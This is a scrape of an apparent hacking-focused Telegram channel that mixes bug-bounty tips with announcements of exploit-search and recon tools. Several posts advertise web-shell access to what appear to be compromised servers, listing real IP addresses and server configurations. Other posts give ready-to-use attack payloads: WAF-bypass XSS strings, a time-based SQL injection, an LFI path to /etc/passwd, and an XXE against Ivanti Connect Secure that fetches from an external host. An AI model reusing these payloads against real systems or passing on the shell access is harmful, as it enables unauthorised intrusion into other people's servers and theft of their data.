BugCod3 – Telegram
BugCod3
6.23K subscribers
308 photos
5 videos
7 files
408 links
ɪɴ ᴛʜᴇ ɴᴀᴍᴇ ᴏꜰ ɢᴏᴅ

[ BugCod3 ] — From Shadows To Shells ⚡️

🕶 Hacking | 🐞 Bug Bounty | 🔐 Security Tools
⚔️ Learn • Hunt • Dominate

🌐 Group: T.me/BugCod3GP
📂 Topic: T.me/BugCod3Topic

🤖 Contact: T.me/BugCod3BOT
📧 Email: BugCod3@protonmail.com
Download Telegram
PHP: 8.2.15

Safe Mode: OFF

ServerIP: 50.116.94.196 [🇺🇸]

Domains: 428 domains

HDD: Total:393.53 GB
Free:21.53 GB [5%]

Useful : make php perl python ruby tar gzip nc

Downloader: wget lynx links curl lwp-mirror

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : ON
Sole Sad & Invisible

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: Apache

🔗 Link

Enjoy... ⭐️

#Shell

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
1❤‍🔥1🔥1😢1
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3👎211
Bypass Cloudflare WAF (XSS without parentheses)

javanoscript:var{a:onerror}={a:alert};throw%20document.domain


#xss #bugbountytips #infosec

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
11🔥1
Akamai WAF (new, requires a click to pop)

<A %252F=""Href= JavaScript:k='a',top[k%2B'lert'](1)>


Vector PoC

#XSS #Bypass

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
11🔥1
🐱 SiCat 🐱

The useful exploit finder

💬
SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.

SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.

🔼 Installation:
pip  install  -r  requirements.txt


💻 Usage:
python sicat.py --help


📂 Example:
From keyword:
python sicat -k telerik --exploitdb --msfmodule

From nmap output:
nmap -sV localhost -oX nmap_out | python sicat -nm --packetstorm


😸 Github

⬇️ Download
🔒 BugCod3

#Exploit #Metasploit #Finder

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
21👍1🔥1🐳1
🔥New Triaged report Sql Injection 😍 > Payload used time-based poc.

,%27%29%20AND%20%28SELECT%209683%20FROM%20%28SELECT%28SLEEP%285%29%29%29FKuq%29--%20wXyW


MySQL

#bugbountytip #infosec

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
2👎21🔥1
Free Shell

🔗 Link

#Shell

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
31🔥1😍1🐳1
Bypass Cloudflare WAF (XSS without parentheses) inside an anchor tag

javanoscript:var{a:onerror}={a:alert};throw%20document.domain

#bugbountytips #bugbounty

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
21🔥1
Command Injection Payload List

⬇️ Download

#Payload #Command #Injection

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
21🔥1
☠️ xnLinkFinder v4.4 ☠️

💬
A python tool used to discover endpoints, potential parameters, and a target specific wordlist for a given target

📊 This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:
⚪️ crawling a target (pass a domain/URL)
⚪️ crawling multiple targets (pass a file of domains/URLs)
⚪️ searching files in a given directory (pass a directory name)
⚪️ get them from a Burp project (pass location of a Burp XML file)
⚪️ get them from an OWASP ZAP project (pass location of a ZAP ASCII message file)
⚪️ get them from a Caido project (pass location of a Caido export CSV file)
⚪️ processing a waymore results directory (searching archived response files from waymore -mode R and also requesting URLs from waymore.txt and the original URLs from index.txt - see waymore README.md)

🔼 Installation:
cd xnLinkFinder
sudo python setup.py install


💻 Usage:
python xnLinkFinder.py --help


📂 Examples:
#specific target
python3 xnLinkFinder.py -i target.com -sf target.com

#list of URLs
python3 xnLinkFinder.py -i target_js.txt -sf target.com


😸 Github

⬇️ Donwload
🔒 BugCod3

#Python #Discover #Endpoints

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
👍32🔥21
NetProbe: Network Probe

💬
NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.

📊 Features:
⚪️ Scan for devices on a specified IP address or subnet
⚪️ Display the IP address, MAC address, manufacturer, and device model of discovered devices
⚪️ Live tracking of devices (optional)
⚪️ Save scan results to a file (optional)
⚪️ Filter by manufacturer (e.g., 'Apple') (optional)
⚪️ Filter by IP range (e.g., '192.168.1.0/24') (optional)
⚪️ Scan rate in seconds (default: 5) (optional)

🔼 Installation:
cd NetProbe
pip install -r requirements.txt


💻 Usage:
python3 netprobe.py —help


📂 Example:
python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l


😸 Github

⬇️ Download
🔒 BugCod3

#Python #Network #Scanner #Vulnerability #Tools

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
43🔥1
PHP: 8.1.27

Safe Mode: OFF

ServerIP: 213.158.95.90 [🇮🇹]

HDD: Total:1536.00 GB
Free:1322.97 GB [86%]

useful:--------------

Downloader: --------------

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : OFF

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: nginx/1.22.0

🔗 Link

Enjoy... ⭐️

#Shell

🔥 0Day.Today
📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
41👍1🔥1
I found a url like this :
https://domain.io/redirect?url=some_base_64_encoded_string

encoded javanoscript:alert("Xss by vikas") to base64 like :
amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=

Now the new url is like this :
https://domain.io/redirect?`url=amF2YXNjcmlwdDphbGVydCgiWHNzIGJ5IHZpa2FzIik=`

📘 Twitter

#bugbounty #xss #infosec

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
2🔥21🤣1
ALWAYS test 404 Not Found in Bug Bounties!

🔗 Medium
🔗 Freedium

#Writeup

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
51👍1🔥1
👋 LFI Payload 👋

Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"

#bugbountytips #bugbounty #CyberSecurity

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
3🔥2❤‍🔥11
CVE-2024-22024

XXE on Ivanti Connect Secure

☠️ payload encoded base64:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>

send it to:
127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm

#bugbountytips #cve #Ivanti

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
22🔥1
JSON Smuggling: A far-fetched intrusion detection evasion technique

🔗 Medium

#infosec #cybersecurity #blueteam

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
21🔥1